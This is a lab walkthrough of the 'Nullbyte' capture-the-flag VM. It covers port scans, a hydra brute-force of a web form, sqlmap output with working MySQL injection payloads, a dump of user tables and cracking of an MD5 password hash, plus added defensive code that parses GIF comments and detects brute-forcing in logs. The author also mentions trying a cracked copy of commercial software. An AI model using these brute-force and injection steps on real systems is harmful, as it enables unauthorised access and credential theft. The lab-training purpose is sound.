Nullbyte

Results of the four nmap scans

  • Detailed TCP scan:
┌──(kali㉿kali)-[/1-20/Nullbyte]
└─$ sudo nmap -sT -sV -sC -O -p80,111,777,46988 192.168.59.133 -oA nmapscan/tcpdetails
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-17 21:24 EDT
Nmap scan report for 192.168.59.133
Host is up (0.00076s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35043/tcp6 status
| 100024 1 37122/udp status
| 100024 1 46988/tcp status
|_ 100024 1 49400/udp6 status
777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
| 2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
| 256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
|_ 256 bc:f7:44:8d:79:6a:19:48:76:a3:e2:44:92:dc:13:a2 (ED25519)
46988/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:B8:11:D5 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.76 seconds

Try the web service on port 80 first; RPC and SSH are lower priority.

  • Full UDP port scan:

  • TCP vulnerability scan:

┌──(kali㉿kali)-[/1-20/Nullbyte]
└─$ sudo nmap --script=vuln -p 80,111,777,46988 192.168.59.133 -oA nmapscan/tcpvuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-17 21:25 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 93.39% done; ETC: 21:26 (0:00:00 remaining)
Stats: 0:04:45 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.21% done; ETC: 21:30 (0:00:02 remaining)
Nmap scan report for 192.168.59.133
Host is up (0.00060s latency).

PORT STATE SERVICE
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /phpmyadmin/: phpMyAdmin
|_ /uploads/: Potentially interesting folder
111/tcp open rpcbind
777/tcp open multiling-http
46988/tcp open unknown
MAC Address: 00:0C:29:B8:11:D5 (VMware)

The vulnerability scan did not turn up much of value; it only found two interesting directories on port 80, and gobuster directory brute-forcing showed nothing else of interest apart from javascript and the two above. They are worth visiting first: phpmyadmin is database related, and if uploads is accessible it would help with exploiting a file upload vulnerability.

Web penetration testing

Visiting the site shows a hint: (screenshot 2024-06-18-09-42-01). Following the hint I searched for the rule it refers to, skimmed it, and did not immediately understand what it meant. Next I tried the directories found by nmap: (screenshot 2024-06-18-09-59-16) access is denied; (screenshot 2024-06-18-09-59-43) is the phpMyAdmin login page. I first tried the default credentials (root with an empty password): (screenshot 2024-06-18-10-02-13). Authentication-bypass strings ("universal passwords") did not work either, and brute-forcing was put aside for now because it might trigger a password policy mechanism and because of the time cost. Next I tried sqlmap: enter an arbitrary username and password, capture the request in Burp, copy the whole request, append * to the end of the username and password field values to mark them as candidate injection parameters, and save it as a text file req1.txt. Running sqlmap on it with several options gave no result, so I guessed there was some special protection in place. (PS: I was stuck here for quite a while; after many attempts and pooling all the information gathered I found nothing of value, so I watched the first part of the walkthrough video for this box.)

(Hint from the video) Trying to extract hidden information from the image

Watching the video I realised I had missed a key piece of information: the image shown on the site. Whenever an image appears, consider whether it carries hidden information (steganography)! So I downloaded the image and inspected it with file (mainly to confirm the file format) and exiftool (not just for images: any downloaded file can be checked for metadata with this command first):

┌──(kali㉿kali)-[/1-20/Nullbyte]
└─$ file level1.gif
level1.gif: GIF image data, version 89a, 235 x 302

┌──(kali㉿kali)-[/1-20/Nullbyte]
└─$ exiftool level1.gif
ExifTool Version Number : 12.67
File Name : level1.gif
Directory : .
File Size : 17 kB
File Modification Date/Time : 2024:06:18 00:56:13-04:00
File Access Date/Time : 2024:06:18 01:28:42-04:00
File Inode Change Date/Time : 2024:06:18 00:57:07-04:00
File Permissions : -rw-r--r--
File Type : GIF
File Type Extension : gif
MIME Type : image/gif
GIF Version : 89a
Image Width : 235
Image Height : 302
Has Color Map : No
Color Resolution Depth : 8
Bits Per Pixel : 1
Background Color : 0
Comment : P-): kzMb5nVYJw
Image Size : 235x302
Megapixels : 0.071

The Comment field contains a string, which is very likely a password or other sensitive information. Combined with what had been collected so far, it could be tried in turn as the phpMyAdmin password and as the SSH root password (taking the second half first, since the first half looks like a smiley and is unlikely to be a password; try the other part if that fails). Neither worked. Another thing to keep in mind is that if such a string is not a credential it may be the name of a hidden directory or file, and that attempt succeeded: (screenshot 2024-06-18-13-38-31). Looking at the source: (screenshot 2024-06-18-13-38-55). The comment says this form does not talk to the back-end database and that the key is not a complicated password, which is clearly telling us to try brute-forcing the form value.
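To show what exiftool's Comment field actually is at the byte level, here is an added example (mine, not part of the original writeup) that walks the GIF89a block structure and pulls out every Comment Extension. The 1x1 GIF it parses is constructed inline and is not the level1.gif from the box; only the comment text is borrowed from the exiftool output above.

```python
from __future__ import annotations
import struct

# Added example, not the writeup's code: a small GIF block walker that extracts
# Comment Extension blocks (0x21 0xFE), the field exiftool reports as "Comment".


def _read_sub_blocks(data: bytes, pos: int) -> tuple[list[bytes], int]:
    """Read a chain of GIF data sub-blocks starting at pos; return (chunks, position after the terminator)."""
    chunks: list[bytes] = []
    while True:
        size = data[pos]
        pos += 1
        if size == 0:                       # block terminator
            return chunks, pos
        chunks.append(data[pos:pos + size])
        pos += size


def gif_comments(data: bytes) -> list[str]:
    """Return every Comment Extension found in a GIF byte string, in file order."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF file")
    packed = data[10]                       # logical screen descriptor flags
    pos = 13
    if packed & 0x80:                       # global colour table present
        pos += 3 * (2 << (packed & 0x07))
    comments: list[str] = []
    while pos < len(data):
        marker = data[pos]
        if marker == 0x3B:                  # trailer: end of stream
            break
        if marker == 0x21:                  # extension introducer
            label = data[pos + 1]
            chunks, pos = _read_sub_blocks(data, pos + 2)
            if label == 0xFE:               # comment extension
                comments.append(b"".join(chunks).decode("latin-1"))
        elif marker == 0x2C:                # image descriptor
            ipacked = data[pos + 9]
            pos += 10
            if ipacked & 0x80:              # local colour table
                pos += 3 * (2 << (ipacked & 0x07))
            pos += 1                        # LZW minimum code size
            _, pos = _read_sub_blocks(data, pos)
        else:
            raise ValueError(f"unexpected block 0x{marker:02x} at offset {pos}")
    return comments


def build_sample_gif(comment: bytes | None) -> bytes:
    """Constructed 1x1 GIF89a (sample input, not level1.gif): an optional comment
    extension, a two-entry global colour table and a minimal image block."""
    if comment is not None and len(comment) > 255:
        raise ValueError("sample keeps the comment in a single sub-block")
    header = b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0)
    gct = b"\x00\x00\x00\xff\xff\xff"
    ext = b"" if comment is None else b"\x21\xFE" + bytes([len(comment)]) + comment + b"\x00"
    image = b"\x2C" + struct.pack("<HHHHB", 0, 0, 1, 1, 0) + b"\x02" + b"\x02\x44\x01" + b"\x00"
    return header + gct + ext + image + b"\x3B"


if __name__ == "__main__":
    sample = build_sample_gif(b"P-): kzMb5nVYJw")   # comment text taken from the exiftool output
    print(gif_comments(sample))
```

Graphic control, plain text and application extensions share the same sub-block layout, so the generic skip handles them; a comment longer than 255 bytes arrives as several sub-blocks and is joined back together.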

Trying to brute-force the form value with hydra

With the requirement clear, a Google search for a solution: (screenshot 2024-06-18-14-05-25). I eventually found an article showing that hydra can brute-force forms, with a detailed worked example. Open F12 - Network, enter an arbitrary key and press Ctrl+R to capture the request: the form is submitted as a POST request and the key just entered appears in the payload: (screenshots 2024-06-18-14-14-45, 2024-06-18-14-14-51). Combined with the error message the page returns, the hydra command can now be constructed:

┌──(kali㉿kali)-[/1-20/Nullbyte]
└─$ sudo hydra -l none -P /usr/share/wordlists/rockyou.txt 192.168.59.133 http-post-form "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -V
...
[ATTEMPT] target 192.168.59.133 - login "none" - pass "destination" - 25255 of 14344399 [child 2] (0/0)
[ATTEMPT] target 192.168.59.133 - login "none" - pass "deathangel" - 25256 of 14344399 [child 5] (0/0)
[ATTEMPT] target 192.168.59.133 - login "none" - pass "dale88" - 25257 of 14344399 [child 7] (0/0)
[80][http-post-form] host: 192.168.59.133 login: none password: elite
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-18 02:41:26

The situation differs slightly from the article's example, but treating the key as the password when building the command is enough. A username still has to be specified: the form has no username field, but hydra errors out without one. The brute force found the key elite. Entering it leads to another form page whose function is to look up a user's information by username: (screenshot 2024-06-18-14-44-41). The request uses GET, and this function very probably does talk to the back-end database, querying it and returning the result to the front end, so SQL injection can be tried.
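From the defender's side, the hydra run above is easy to spot in the web server's access log: one client POSTing the same form path many times a minute. The following added example (mine, not from the writeup) parses Apache combined-format log lines and flags that pattern, and separately flags requests carrying the sqlmap User-Agent string that appears later on this page. The log lines are constructed to resemble the session above; the client address 192.168.59.131 is taken from the reverse-shell command later in the writeup, and the threshold and window are assumptions to be tuned per site.

```python
from __future__ import annotations
import re
from collections import defaultdict, deque
from datetime import datetime

# Added example, not the writeup's code: detection of form brute-forcing and of a
# known scanner User-Agent in Apache combined-format access logs.

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line: str) -> dict | None:
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def find_form_bruteforce(lines, threshold: int = 20, window_s: int = 60) -> set[tuple[str, str]]:
    """Return (ip, path) pairs that POSTed to the same path at least `threshold`
    times inside any `window_s`-second window. Lines must be in time order."""
    recent: dict[tuple[str, str], deque] = defaultdict(deque)
    flagged: set[tuple[str, str]] = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        key = (rec["ip"], rec["path"])
        q = recent[key]
        q.append(rec["ts"])
        while (q[-1] - q[0]).total_seconds() > window_s:   # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold:
            flagged.add(key)
    return flagged


def find_scanner_agents(lines, markers=("sqlmap",)) -> set[tuple[str, str]]:
    """Return (ip, user-agent) pairs whose User-Agent contains a known tool name."""
    found: set[tuple[str, str]] = set()
    for line in lines:
        rec = parse_line(line)
        if rec and any(m.lower() in rec["ua"].lower() for m in markers):
            found.add((rec["ip"], rec["ua"]))
    return found


def _line(ip, second, method, path, status, ua="Mozilla/5.0"):
    return (f'{ip} - - [18/Jun/2024:14:20:{second:02d} -0400] '
            f'"{method} {path} HTTP/1.1" {status} 512 "-" "{ua}"')


# Constructed sample log: a few ordinary requests, 30 form POSTs from one client
# within 30 seconds, and one request carrying sqlmap's User-Agent string.
SAMPLE_LOG = (
    [_line("192.168.59.10", 1, "GET", "/", 200), _line("192.168.59.10", 2, "GET", "/main.gif", 200)]
    + [_line("192.168.59.131", 3 + i, "POST", "/kzMb5nVYJw/index.php", 200) for i in range(30)]
    + [_line("192.168.59.131", 40, "GET", "/kzMb5nVYJw/420search.php?usrtosearch=root", 200,
             "sqlmap/1.8.5#stable (https://sqlmap.org)")]
)

if __name__ == "__main__":
    print(find_form_bruteforce(SAMPLE_LOG))
    print(find_scanner_agents(SAMPLE_LOG))
```

Rate is the robust signal here: the tool's User-Agent is trivially changed, while a login form that returns "invalid key" twenty times in a minute to one client is not something a normal user does, and it is what a lockout or rate limit on the form should be keyed on.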

SQL injection

As usual, scan with sqlmap first:

┌──(kali㉿kali)-[/1-20/Nullbyte]
└─$ sudo sqlmap -u http://192.168.59.133/kzMb5nVYJw/420search.php?usrtosearch=root -v 4
...
[02:50:28] [DEBUG] setting the HTTP User-Agent header
[02:50:28] [DEBUG] creating HTTP requests opener object
[02:50:29] [INFO] resuming back-end DBMS 'mysql'
[02:50:29] [INFO] testing connection to the target URL
[02:50:29] [TRAFFIC OUT] HTTP request [#1]:
GET /kzMb5nVYJw/420search.php?usrtosearch=root HTTP/1.1
Cache-Control: no-cache
User-Agent: sqlmap/1.8.5#stable (https://sqlmap.org)
Host: 192.168.59.133
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close

[02:50:29] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: usrtosearch (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: usrtosearch=root" OR NOT 9840=9840#
Vector: OR NOT [INFERENCE]#

Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: usrtosearch=root" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71766b6a71,(SELECT (ELT(9245=9245,1))),0x716b787071,0x78))s), 8446744073709551610, 8446744073709551610)))-- Izlj
Vector: AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: usrtosearch=root" AND (SELECT 5073 FROM (SELECT(SLEEP(5)))UCBe)-- rtZt
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: usrtosearch=root" UNION ALL SELECT NULL,CONCAT(0x71766b6a71,0x4a70655477626d50744d596279654e4f4c6947436b685755734b475668684562626d5652594f5245,0x716b787071),NULL#
Vector: UNION ALL SELECT NULL,[QUERY],NULL#
---
[02:50:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.5
[02:50:29] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.59.133'

[*] ending @ 02:50:29 /2024-06-18/

It quickly finds the injection and reports the payloads, so next comes the information-gathering phase of SQL injection: enumerating databases, tables and so on:

  • Current database banner (version):
[03:59:35] [DEBUG] performed 1 query in 0.03 seconds
web server operating system: Linux Debian 8 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.5
banner: '5.5.44-0+deb8u1'
  • Current database name:
[02:55:24] [DEBUG] performed 1 query in 0.03 seconds
current database: 'seth'
  • Current user:
[02:58:26] [DEBUG] performed 1 query in 0.04 seconds
current user: 'root@localhost'

The current user is already root; lucky.

  • All databases:
[03:04:25] [DEBUG] performed 1 query in 0.03 seconds
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth

  • All tables in the seth database:
[03:06:13] [DEBUG] performed 2 queries in 0.28 seconds
Database: seth
[1 table]
+-------+
| users |
+-------+
  • All columns of the users table in seth:
[03:13:53] [DEBUG] performed 2 queries in 0.06 seconds
Database: seth
Table: users
[4 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| position | text |
| user | text |
| id | smallint(6) |
| pass | text |
+----------+-------------+
  • All usernames and passwords in seth:
[03:25:55] [DEBUG] performed 2 queries in 0.05 seconds
[03:25:55] [DEBUG] analyzing table dump for possible password hashes
Database: seth
Table: users
[2 entries]
+--------+
| user |
+--------+
| isis |
| ramses |
+--------+

[03:25:55] [INFO] table 'seth.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.59.133/dump/seth/users.csv'

[03:27:09] [DEBUG] performed 3 queries in 0.06 seconds
[03:27:09] [DEBUG] analyzing table dump for possible password hashes
Database: seth
Table: users
[2 entries]
+---------------------------------------------+
| pass |
+---------------------------------------------+
| YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE |
| --not allowed-- |
+---------------------------------------------+

[03:27:09] [INFO] table 'seth.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.59.133/dump/seth/users.csv'

The phpmyadmin database also needs to be looked at:

  • All tables in the phpmyadmin database:
[03:30:16] [DEBUG] performed 2 queries in 0.07 seconds
Database: phpmyadmin
[17 tables]
+-----------------------+
| pma__bookmark |
| pma__column_info |
| pma__designer_coords |
| pma__favorite |
| pma__history |
| pma__navigationhiding |
| pma__pdf_pages |
| pma__recent |
| pma__relation |
| pma__savedsearches |
| pma__table_coords |
| pma__table_info |
| pma__table_uiprefs |
| pma__tracking |
| pma__userconfig |
| pma__usergroups |
| pma__users |
+-----------------------+
  • All columns of pma__users in phpmyadmin:
[03:31:49] [DEBUG] performed 2 queries in 0.05 seconds
Database: phpmyadmin
Table: pma__users
[2 columns]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| usergroup | varchar(64) |
| username | varchar(64) |
+-----------+-------------+
  • All rows of pma__users in phpmyadmin: nothing was returned, and the other tables held nothing of value either. Given everything gathered so far, the next step is to crack the hash and then try logging in over SSH and so on.

Cracking the MySQL password hash with hashcat [failed attempt]

Before cracking, it is best to identify the hash algorithm first:

┌──(kali㉿kali)-[/1-20/Nullbyte]
└─$ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE

Not Found.

It could not be identified, so I tried letting hashcat auto-detect and crack it directly. Cracking on Linux was too slow, so I tried cracking on Windows with GPU (AMD card) support. Before cracking, run hashcat's self-test with the -b option to benchmark the GPU (it measures hashcat's speed on the various hash types and at the same time checks the GPU and its driver):

F:\sectools\hashcat-6.2.6>hashcat.exe -b
hashcat (v6.2.6) starting in benchmark mode
...
--------------------------------------------------------
* Hash-Mode 7500 (Kerberos 5, etype 23, AS-REQ Pre-Auth)
--------------------------------------------------------

* Device #3: ATTENTION! OpenCL kernel self-test failed.

Your device driver installation is probably broken.
See also: https://hashcat.net/faq/wrongdriver

Speed.#1.........: 618.6 MH/s (80.89ms) @ Accel:256 Loops:256 Thr:32 Vec:1
Speed.#3.........: 3820.2 kH/s (67.10ms) @ Accel:2 Loops:1024 Thr:8 Vec:4
Speed.#*.........: 622.4 MH/s

(To be completed) Fixing the problems with GPU-mode cracking in hashcat on Windows

The problem was detected quickly. Opening the official URL above, the official fix steps are as follows:

Windows specific steps:

1. Completely uninstall the current driver (use Windows Software Center)
2. Reboot
3. Recommended: Download and start Driver Fusion (free version is enough; select “Display”, AMD/NVidia/Intel, ignore the warning about Premium version)
4. Reboot
5. Make sure that no Intel OpenCL SDK, AMD-APP-SDK or CUDA-SDK framework is installed – if it is installed, uninstall it!
6. Manually delete remaining OpenCL.dll, OpenCL32.dll, OpenCL64.dll files on all folders. You should find at least 2. They usually reside in “c:\windows\syswow64” and “c:\windows\system32”. This step is very important!
7. Reboot
8. Install the driver recommended on https://hashcat.net/hashcat/. If it says “exact”, it means exact.
9. Reboot
10. Reinstall hashcat - choose:
Stable version: Download and extract the newest hashcat from https://hashcat.net/
Beta version: https://hashcat.net/beta/
Development version: git clone https://github.com/hashcat/hashcat
11. Try to run hashcat --benchmark
------------------------------------------------------
Linux specific steps:

1. Completely uninstall the current driver
NVIDIA: nvidia-uninstall
AMD: amdconfig --uninstall=force
If you installed the driver via a package manager, remove those packages
Make sure to purge those packages, not just uninstall them
2. Reboot
3. Make sure that no Intel OpenCL SDK, AMD-APP-SDK or CUDA-SDK framework is installed – if it is installed, uninstall it!
4. Find all packages installed that provide a libOpenCL, then purge them:
dpkg -S libOpenCL
find / -name libOpenCL\* -print0 | xargs -0 rm -rf
5. Reboot
6. apt-get install ocl-icd-libopencl1 opencl-headers clinfo
7. Install the driver recommended on https://hashcat.net/hashcat/. If it says “exact”, it means exact.
For AMD GPUs on Linux, see ROCm instructions here.
8. Reboot
9. rm -rf ~/.hashcat/kernels
10. Reinstall hashcat - choose:
Stable version: Download and extract (use “7z x” to extract) the newest hashcat from https://hashcat.net/
Beta version: https://hashcat.net/beta/
Development version: git clone https://github.com/hashcat/hashcat
11. Try to run clinfo first in your terminal
12. Try to run hashcat --benchmark

First, uninstall the NVIDIA graphics driver: (screenshot 2024-06-19-11-34-23). Then reboot.

Install the free version of Driver Fusion and open it, then Health Check - Check for problems; after the scan, search for nvidia and click Fix this problem for each entry: (screenshot 2024-06-19-11-47-53). However, that feature requires the Premium version, which forced me to look for a cracked copy; its safety cannot be guaranteed, but after weighing the risk I decided to go ahead anyway. The cracked copies I tried would not open, though, so I had to look for an alternative tool of the same kind and eventually found this one. Then scan, and let it update and install the driver automatically: (screenshot 2024-06-19-13-10-09). Reboot after installation.

Then remove the relevant SDKs as in step 5, and as in step 6 manually search for and delete the three OpenCL-related DLLs in the two directories (if permissions are insufficient, the forced-delete feature of tools such as 360 can be used), then reboot again. These two steps are the most important.

At this point, run hashcat's self-test mode again to see which errors come up:

F:\sectools\hashcat-6.2.6>hashcat.exe -b
hashcat (v6.2.6) starting in benchmark mode

Benchmarking uses hand-optimized kernel code by default.
You can use it in your cracking session by setting the -O option.
Note: Using optimized kernel code limits the maximum supported password length.
To disable the optimized kernel code in benchmark mode, use the -w option.

ATTENTION! No OpenCL, Metal, HIP or CUDA installation found.

You are probably missing the CUDA, HIP or OpenCL runtime installation.

* AMD GPUs on Windows require this driver:
"AMD Adrenalin Edition" (Adrenalin 22.5.1 exactly)
* Intel CPUs require this runtime:
"OpenCL Runtime for Intel Core and Intel Xeon Processors" (16.1.1 or later)
* NVIDIA GPUs require this runtime and/or driver (both):
"NVIDIA Driver" (440.64 or later)
"CUDA Toolkit" (9.0 or later)

Re-check the GPU driver version requirements mentioned on the official page: (screenshot 2024-06-19-13-47-51). The two match. The current NVIDIA driver version can be seen via the house icon in the NVIDIA Control Panel: (screenshot 2024-06-19-13-58-54). Then reinstall CUDA, accepting all defaults.

Running it may still produce errors, however:

F:\sectools\hashcat-6.2.6>hashcat.exe -a 3 -D 2 ..\hashes.hash ..\wordlists\rockyou.txt -t 1000

hashcat (v6.2.6) starting in autodetect mode

Successfully initialized the NVIDIA main driver CUDA runtime library.

Failed to initialize NVIDIA RTC library.

* Device #1: CUDA SDK Toolkit not installed or incorrectly installed.
CUDA SDK Toolkit required for proper device support and utilization.
Falling back to OpenCL runtime.

* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

OpenCL API (OpenCL 3.0 CUDA 12.4.131) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #1: NVIDIA GeForce RTX 4060 Laptop GPU, 8064/8187 MB (2046 MB allocatable), 24MCU

OpenCL API (OpenCL 3.0 ) - Platform #2 [Intel(R) Corporation]
=============================================================
* Device #2: Intel(R) UHD Graphics 770, 15072/30220 MB (2047 MB allocatable), 16MCU

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

5700 | Cisco-IOS type 4 (SHA256) | Operating System

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

The following errors appeared:

  • Problem 1: Failed to initialize NVIDIA RTC library.
  • Problem 2: WARNING! Kernel exec timeout is not disabled.
  • Problem 3: nvmlDeviceGetFanSpeed(): Not Supported

After some searching, the fixes are as follows. For problem 1, select the matching platform on the official site and install CUDA, then reboot; after running hashcat again the error was gone. (If CUDA was installed correctly earlier, this problem normally does not occur.)

For problem 2, the fix differs between Windows 11 and Windows 10. On Windows 11, open Nsight Monitor as administrator. Note that it uses port 8000 by default; if it reports the port as in use, right-click its icon in the taskbar, choose Options, and change it: (screenshot 2024-06-19-10-40-13). Restart the program. Then, in the same Options dialog, set WDDM TDR Enabled to False and reboot the computer.

  • Cause of this warning: when running hashcat with extreme performance settings, the user may hit a crash after which the GPU is automatically recovered by a driver reset. This happens because a kernel ran longer than the 2-second limit. The feature is useful for preventing screen freezes but is of no use for hash cracking.
  • What the fix does: it disables TDR (Timeout Detection and Recovery). TDR is a mechanism introduced in Windows Vista and later versions to detect and recover from a graphics driver that has stopped responding. If the operating system receives no response from the GPU within a certain time, TDR is triggered, the GPU is reset, and the message "Display driver stopped responding and has recovered" is shown.

Note: disabling TDR may make the system unstable or unable to recover from GPU problems. This method is only suitable during development or testing and is not recommended for ordinary users.

For problem 3, searching shows it is not a hashcat error and has little impact, so it can be ignored.

After rebooting and running again, cracking works but the GPU's full performance is not used at all; it is even slower than cracking on Linux, and a new problem appears:

  • Problem 4
The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.

PS: even after fixing the problems above, the hash still was not cracked; I was stuck here for at least a day.

(Hint from the video) Re-identifying the encoded string and cracking the MySQL password hash with john/hashcat

Only after watching the video did I realise I had been cracking the wrong thing: what I had was the real hash after base64 encoding, which is why hash-identifier immediately reported it could not identify it. The video first base64-decodes the string and only then cracks it. The lesson is that my experience in recognising common encodings and hash values was lacking. The correct steps are as follows:

┌──(kali㉿kali)-[~/Desktop/redteamnotes_benchmark_1-20/vulnhub/Nullbyte]
└─$ echo -n YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | base64 -d
c6d6bd7ebf806f43c76acc3681703b81base64: invalid input

Now c6d6bd7ebf806f43c76acc3681703b81 is the real hash! (The "invalid input" message is only because the 43-character string is missing its trailing = padding; the decoded bytes printed before it are complete.) Identify the hash algorithm:

HASH: c6d6bd7ebf806f43c76acc3681703b81
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

This shows it is an MD5-type hash.

Crack the hash with john:

┌──(kali㉿kali)-[~/Desktop/redteamnotes_benchmark_1-20/vulnhub/Nullbyte]
└─$ john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt md5_hash
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
omega (?)
1g 0:00:00:00 DONE (2024-06-19 03:15) 100.0g/s 1152Kp/s 1152Kc/s 1152KC/s verbatim..snuffy
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

hashcat on Linux also cracks it quickly:

┌──(kali㉿kali)-[~/Desktop/redteamnotes_benchmark_1-20/vulnhub/Nullbyte]
└─$ sudo hashcat -m 0 -a 0 md5_hash /usr/share/wordlists/rockyou.txt
...
c6d6bd7ebf806f43c76acc3681703b81:omega
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: c6d6bd7ebf806f43c76acc3681703b81
Time.Started.....: Wed Jun 19 03:10:57 2024 (0 secs)
Time.Estimated...: Wed Jun 19 03:10:57 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1095.9 kH/s (0.54ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
